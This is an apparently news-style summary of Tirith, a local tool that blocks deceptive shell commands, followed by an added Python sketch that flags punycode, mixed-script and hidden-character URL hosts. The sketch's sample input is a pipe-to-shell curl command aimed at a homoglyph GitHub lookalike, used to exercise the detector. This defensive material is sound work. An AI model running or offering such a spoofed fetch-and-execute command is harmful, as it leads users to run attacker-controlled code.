Tirith is a new open-source, cross-platform tool that detects and blocks homoglyph and other deceptive attacks in command-line environments by analyzing URLs in pasted or typed commands and preventing their execution. It hooks into shells like zsh, bash, fish, and PowerShell to inspect commands locally with sub-millisecond overhead, offering byte-level Unicode inspection and offline auditing without sending telemetry.
Key points
- Tirith inspects every pasted or typed command in supported shells and can stop execution of suspicious commands.
- It detects homoglyph/homograph attacks, punycode, mixed scripts, and other Unicode lookalikes in URLs.
- The tool also blocks terminal injection, hidden characters, pipe-to-shell patterns, dotfile hijacking, and insecure transports.
- All analysis runs locally with no network calls, no telemetry, and no modification of pasted commands.
- Available on GitHub and via many package managers for Windows, Linux, and macOS, but it does not hook into cmd.exe.
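
To make the URL checks listed above concrete, here is an added example (not Tirith's code and not taken from the project) that pulls URL hosts out of a command line and flags punycode labels, non-ASCII characters, mixed scripts, hidden format characters and plain-HTTP transport. The function names, the finding tags and the sample command are assumptions made for this sketch, and the script test is a coarse one based on Unicode character names.

```python
import re
import unicodedata

# Scheme and authority of every http(s) URL found in a command line.
URL_RE = re.compile(r"(https?)://([^\s/?#'\"|;&<>]+)", re.IGNORECASE)

def script_of(ch):
    """Coarse script tag from the Unicode name; None if script-neutral."""
    if ch.isascii():
        return "LATIN" if ch.isalpha() else None
    if unicodedata.category(ch).startswith("M"):  # combining marks
        return None
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def inspect_host(host):
    """Return sorted finding tags (names are this example's own) for a host."""
    findings = set()
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            findings.add("punycode")
            try:  # decode so the checks below see the real characters
                label = label[4:].encode("ascii").decode("punycode")
            except ValueError:
                findings.add("invalid-punycode")
                continue
        visible = "".join(c for c in label if unicodedata.category(c) != "Cf")
        if visible != label:
            findings.add("hidden-char")
        if not visible.isascii():
            findings.add("non-ascii")
        if len({s for s in map(script_of, visible) if s}) > 1:
            findings.add("mixed-script")
    return sorted(findings)

def inspect_command(command):
    """Map each flagged URL host in a command to its findings."""
    report = {}
    for scheme, authority in URL_RE.findall(command):
        host = authority.rsplit("@", 1)[-1].split(":", 1)[0]  # drop userinfo, port
        findings = inspect_host(host)
        if scheme.lower() == "http":
            findings.append("insecure-transport")
        if findings:
            report[host] = findings
    return report

if __name__ == "__main__":
    # Constructed sample: the "i" in the host is Cyrillic U+0456.
    print(inspect_command("curl -sSL https://g\u0456thub.com/install.sh | sh"))
```

A label written entirely in one non-Latin script is reported only as non-ascii here, so a whole-script lookalike needs a confusables table on top of this check.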